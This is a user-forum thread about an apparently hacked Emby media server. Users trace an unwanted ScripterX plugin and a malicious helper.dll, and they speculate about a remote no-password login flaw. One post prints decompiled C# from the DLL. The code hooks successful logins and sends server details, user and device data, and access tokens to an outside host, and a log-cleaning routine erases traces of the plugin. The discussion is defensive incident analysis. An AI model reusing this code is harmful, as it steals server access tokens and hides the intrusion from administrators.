Has my Windows emby server been hacked.

[ebr 14930]

1 minute ago, Luke said:

We’ll be able to tell by the features they advertise. 

Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it.  So we'll have to go deeper than that.

[softworkz 3341]

23 minutes ago, ebr said:

Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it.  So we'll have to go deeper than that.

Yes, we need to understand what a plugin does and how and evaluate the risk that is involved.

[bandit8623 48]

End of the day though its up to the server owner to make the decision to install a plugin.   you risk things the more plugins you install....

Edited May 20, 2023 by bandit8623

[tongeha 2]

I'm still trying to determine how it found its way onto the machine. The only way was through emby, all other ports are shut down.

 

Once on the machine it took these actions

1. installed  ScripterX

2. attempted a no password login and was refused

3. tried downloading helper.dll which looks like compromised version of ScripterX

4. uninstalled ScripterX

I am unsure of the correct order.

I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by win 10, {emby_temp}\plugins\EmbyHelper.dll and it does not appear to loaded by any process.

I did had Webhooks install in emby which I never used. Still need to look at Webhooks dependencies and see if uses ScripterX.

 

For now I'm going to run emby in a separate account and only give it access to the media directory on my nas. Or I may go back to running it on ubuntu or a truenas jail.

 

 

 

 

 

[Luke 37116]

6 minutes ago, tongeha said:

I'm still trying to determine how it found its way onto the machine. The only way was through emby, all other ports are shut down.

 

Once on the machine it took these actions

1. installed  ScripterX

2. attempted a no password login and was refused

3. tried downloading helper.dll which looks like compromised version of ScripterX

4. uninstalled ScripterX

I am unsure of the correct order.

I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by win 10, {emby_temp}\plugins\EmbyHelper.dll and it does not appear to loaded by any process.

I did had Webhooks install in emby which I never used. Still need to look at Webhooks dependencies and see if uses ScripterX.

 

For now I'm going to run emby in a separate account and only give it access to the media directory on my nas. Or I may go back to running it on ubuntu or a truenas jail.

 

 

 

 

 

If you mean how did the plug-in get installed, it’s extremely common that users install or configure things when they’re experimenting and then later forget that they did that. We see it on a pretty much daily basis when troubleshooting with users.

[softworkz 3341]

7 minutes ago, tongeha said:

I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by win 10, {emby_temp}\plugins\EmbyHelper.dll and it does not appear to loaded by any process.

Yes, that's because Emby loads plugins in a special way-

And that's not a "temp" directory.

Edited May 20, 2023 by softworkz

[tongeha 2]

Pretty sure it is an emby temp dir. That's the way I have it configured. Emby runs on its own dedicated drive. I have it setup this way because of an old emby bug where it would not cleanup the parts from an hls stream and it would fill up the drive over time.

 

Never installed ScripterX on purpose. I did have Webhooks installed but never used it for anything.

 

D:\emby_temp\cache\0bbbe58aa44244109a8862cc833dc955_channels
D:\emby_temp\cache\c2e44542eacb47e785ff724dc10487c6_channels
D:\emby_temp\cache\fanart-movies
D:\emby_temp\cache\fanart-tv
D:\emby_temp\cache\ffmpeg
D:\emby_temp\cache\httpclient
D:\emby_temp\cache\images
D:\emby_temp\cache\omdb
D:\emby_temp\cache\remote-images
D:\emby_temp\cache\temp
D:\emby_temp\cache\tmdb-movies2
D:\emby_temp\cache\tmdb-tv
D:\emby_temp\cache\tvdb
D:\emby_temp\cache\tvdb-movies
D:\emby_temp\cache\xmltv
D:\emby_temp\cache\fanart-movies\699
D:\emby_temp\cache\fanart-movies\9319
D:\emby_temp\cache\fanart-movies\699\fanart.json
D:\emby_temp\cache\fanart-movies\9319\fanart.json
D:\emby_temp\cache\fanart-tv\290734
D:\emby_temp\cache\fanart-tv\325186
D:\emby_temp\cache\fanart-tv\73255
D:\emby_temp\cache\fanart-tv\290734\fanart.json
D:\emby_temp\cache\fanart-tv\325186\fanart.json

[ebr 14930]

2 hours ago, tongeha said:

I'm still trying to determine how it found its way onto the machine.

What is "it" in that sentence?

[tongeha 2]

The mystery continues. I found this in ScheduleTasks

{
   "StartTimeUtc":"2023-05-11T17:54:54.4550806Z",
   "EndTimeUtc":"2023-05-11T17:54:54.4562473Z",
   "Status":"Completed",
   "Name":"Emby ScripterX Scheduled Task",
   "Key":"embscriptxschedtask00001",
   "Id":"09b64e34940a61db86d4939f418b338b"
}

And this in system.xml

  <UninstalledPlugins>
    <string>TVHeadEnd.dll</string>
    <string>MediaBrowser.Channels.IPTV.dll</string>
    <string>EmbyScripterX.dll</string>
  </UninstalledPlugins>

[ebr 14930]

1 hour ago, tongeha said:

{
   "StartTimeUtc":"2023-05-11T17:54:54.4550806Z",
   "EndTimeUtc":"2023-05-11T17:54:54.4562473Z",
   "Status":"Completed",
   "Name":"Emby ScripterX Scheduled Task",
   "Key":"embscriptxschedtask00001",
   "Id":"09b64e34940a61db86d4939f418b338b"
}

I imagine that was created by the plug-in as that would be a common practice.

1 hour ago, tongeha said:

And this in system.xml

  <UninstalledPlugins>
    <string>TVHeadEnd.dll</string>
    <string>MediaBrowser.Channels.IPTV.dll</string>
    <string>EmbyScripterX.dll</string>
  </UninstalledPlugins>

and I imagine you uninstalled the plug-in when you discovered this situation...?

[Spaceboy 2495]

are you recommending uninstalling this plugin then?

[softworkz 3341]

3 minutes ago, Spaceboy said:

are you recommending uninstalling this plugin then?

Yes.

EDIT: At least for now

Edited May 20, 2023 by softworkz

[Luke 37116]

5 minutes ago, Spaceboy said:

are you recommending uninstalling this plugin then?

I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks.

[TeamB 2354]

if anyone is interested here is the source of the helper.dll linked to in the first post CDN

This is decompiled from the DLL

As mentioned above some interesting tell-tails

    private void subscribeEvents() => this._sessionManager.AuthenticationSucceeded += new EventHandler<GenericEventArgs<AuthenticationResult>>(this._sessionManager_AuthenticationSucceeded);

    private void _sessionManager_AuthenticationSucceeded(
      object sender,
      GenericEventArgs<AuthenticationResult> e)
    {
      AuthenticationResult authenticationResult = e.Argument;
      StringContent content = new StringContent(string.Format("{{\"version\":\"{0}\",\"serverName\":\"{1}\",\"serverPort\":\"{2}\",\"serverHttpsPort\":\"{3}\",\"serverPublicPort\":\"{4}\",\"serverPublicHttpsPort\":\"{5}\",\"serverVersion\":\"{6}\",\"serverPlatformOs\":\"{7}\",\"serverPlatformOsVer\":\"{8}\",\"userId\":\"{9}\",\"username\":\"{10}\",\"userServerName\":\"{11}\",\"serverId\":\"{12}\",\"deviceId\":\"{13}\",\"deviceName\":\"{14}\",\"deviceRemoteIpaddress\":\"{15}\", \"accessToken\":\"{16}\"}}", (object) EmbyHelper.Version.VersionNumber, (object) Plugin._Controller._serverApplicationHost.FriendlyName, (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpServerPortNumber.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpsPortNumber.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicPort.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicHttpsPort.ToString(), (object) Plugin._Controller._applicationHost.ApplicationVersion, (object) Plugin._Controller._environmentInfo.OperatingSystemName, (object) Plugin._Controller._environmentInfo.OperatingSystemVersion, (object) authenticationResult.User.Id.ToString(), (object) authenticationResult.SessionInfo.UserName, (object) authenticationResult.User.ServerName, (object) authenticationResult.ServerId, (object) authenticationResult.SessionInfo.DeviceId, (object) authenticationResult.SessionInfo.DeviceName, (object) authenticationResult.SessionInfo.RemoteEndPoint, (object) authenticationResult.AccessToken), Encoding.UTF8, "application/json");
      HttpResponseMessage httpResponseMessage;
      Task.Run((Func<Task>) (async () => httpResponseMessage = await new HttpClient().PostAsync("https://emmm.spxaebjhxtmddsri.xyz/expanse2362", (HttpContent) content).ConfigureAwait(false)));
    }

and

    public static void CleanLog(string filePath)
    {
      List<string> list = ((IEnumerable<string>) File.ReadAllLines(filePath)).Where<string>((Func<string, bool>) (line => !line.Contains("EmbyHelper") && !line.Contains("ScripterX") && !line.Contains("scripterx"))).ToList<string>();
      File.WriteAllLines(filePath, (IEnumerable<string>) list);
    }

 

helper.zip

[Spaceboy 2495]

9 hours ago, Luke said:

I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks.

i only use it to initiate a comskip process as a recording starts. emby only has options for post processing.

[rbjtech 4289]

11 hours ago, Luke said:

I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks.

Cool - I just use Scripter-X to write a seperate Auth log which is pushed via ssh to my DMZ/RP for fail2ban.

If the native Emby Webhooks can write the Auth log, then I'd happily get rid of scripter-x as I was unhappy with the 'package' side of scripter-X anyway but there is no way to disable just that part ..

Thanks for the update all.

HOWEVER - I'm still unclear (as is the OP) on how scripter-x was installed in the first place.  Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not - as with no local Admin password, that is all it would take to remotely install scripter-x, which then acts as a springboard for further executable code to be downloaded ... ?   

Edited May 21, 2023 by rbjtech

[Spaceboy 2495]

1 hour ago, rbjtech said:

HOWEVER - I'm still unclear (as is the OP) on how scripter-x was installed in the first place.  Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not - as with no local Admin password, that is all it would take to remotely install scripter-x, which then acts as a springboard for further executable code to be downloaded ... ?   

agreed - this has absolutely not been answered and i'm not comforted by the dev's ignoring the explicit questions on this

[ebr 14930]

1 hour ago, rbjtech said:

I'm still unclear (as is the OP) on how scripter-x was installed in the first place

We are too but I think the most likely answer is that it was done years ago and forgotten about.  Perhaps even manually before the plug-in was in the catalog.

[Spaceboy 2495]

9 minutes ago, ebr said:

We are too but I think the most likely answer is that it was done years ago and forgotten about.  Perhaps even manually before the plug-in was in the catalog.

but still not answered the point on whether the vulnerability discovered and patched in beta has been fixed in stable.

avoidance is not a good look

[ebr 14930]

1 minute ago, Spaceboy said:

but still not answered the point on whether the vulnerability discovered and patched in beta has been fixed in stable

The version number has not changed so I don't believe any patches have been issued.

[tongeha 2]

 

I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX  from the logs.

[Spaceboy 2495]

3 hours ago, ebr said:

The version number has not changed so I don't believe any patches have been issued.

can i assume that, based on the lack of activity fixing it, you dont think this is a particularly significant issue?

i really hope you're not just waiting for 4.8 to go stable because it feels like its been a couple of weeks since this issue was reported and you've been hoping in vain for 4.8 to go stable for a while now. and even when it does a lot of people will prefer to remain on 4.7 to the new version settle down. this issue needs patching in 4.7 asap

[flashls82 4]

22 hours ago, tongeha said:

 

I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX  from the logs.

This is definitely what’s happening because it happened to me (on a Synology NAS). Saw an error randomly the other day on a ScripterX task in my log. I never installed it and am the only local user on the system. Looked into it and it was installed about a week ago right after my user authenticated from “127.0.0.1” (was 100% not me and it’s not the local IP that shows up when I log in for real). Not great!!

Edited May 22, 2023 by flashls82

[crusher11 854]

Is this the thing the giant red warning on the forums is about?

Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there?

[softworkz 3341]

1 minute ago, crusher11 said:

Is this the thing the giant red warning on the forums is about?

Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there?

Only on 4.8.0.31 and later. 

Many are still running earlier betas, though.